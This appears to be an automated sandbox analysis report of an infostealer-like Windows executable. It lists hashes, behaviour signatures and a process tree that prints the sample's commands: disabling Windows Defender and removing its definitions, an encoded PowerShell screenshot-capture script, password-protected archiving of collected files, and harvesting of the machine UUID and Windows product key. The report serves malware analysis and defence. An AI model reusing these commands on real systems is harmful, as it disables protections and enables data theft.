Analysis

  • max time kernel
    210s
  • max time network
    201s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250410-en
  • resource tags

    arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15/04/2025, 18:59

General

  • Target

    turan k$yser [email protected]

  • Size

    7.8MB

  • MD5

    94dd93a1e09594567ba2f0bc1af13927

  • SHA1

    3d32ca71a96033eb2f9bfe18d9ae7eceea1d1951

  • SHA256

    79bdb910cdbac46bd809d30d00fbffbc4ec040e1149db4e3bd2675bfc7f1cfef

  • SHA512

    e03268ad5a8f23eb2ddaa0a7488b26291360dc5ad52500f4e058ca90be61c8f91e4d61a3e4bbcac3331b6c53dafd6b827b5a60d653a40a0d593ea6aaa818fde8

  • SSDEEP

    196608:KW5HUOXXKApTj9fZwQRCgiIKpdzjPOan7j2y283TOnOt:dxBw8wIKppDO9it

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 61 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]
    "C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4212
    • C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]
      "C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser [email protected]'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4372
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3196
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4608
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5552
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4380
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bab2dmrh\bab2dmrh.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5116
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4BBE.tmp" "c:\Users\Admin\AppData\Local\Temp\bab2dmrh\CSC9F47072AB3784FF59D6694368DA1B5B9.TMP"
              6⤵
                PID:424
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42122\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\EOBgZ.zip" *"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Users\Admin\AppData\Local\Temp\_MEI42122\rar.exe
            C:\Users\Admin\AppData\Local\Temp\_MEI42122\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\EOBgZ.zip" *
            4⤵
            • Executes dropped EXE
            PID:252
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:232
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4844
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5076
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4556
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5164
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
              PID:1516
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1672
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:400
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3588
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:572
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        1⤵
        • Drops file in Windows directory
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2012
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff82156dcf8,0x7ff82156dd04,0x7ff82156dd10
          2⤵
            PID:2736
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1864,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1860 /prefetch:2
            2⤵
              PID:1152
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2252,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2268 /prefetch:11
              2⤵
                PID:5216
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2392 /prefetch:13
                2⤵
                  PID:5240
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3252 /prefetch:1
                  2⤵
                    PID:5968
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3316 /prefetch:1
                    2⤵
                      PID:5832
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4304,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4328 /prefetch:9
                      2⤵
                        PID:3988
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4720,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4728 /prefetch:1
                        2⤵
                          PID:948
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5324 /prefetch:14
                          2⤵
                            PID:1140
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5392,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5408 /prefetch:14
                            2⤵
                              PID:5896
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=216,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5564 /prefetch:14
                              2⤵
                                PID:3196
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5424 /prefetch:14
                                2⤵
                                  PID:1924
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3588,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5572 /prefetch:14
                                  2⤵
                                    PID:4076
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5736,i,14920822907121272505,14000738223339144438,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4332 /prefetch:10
                                    2⤵
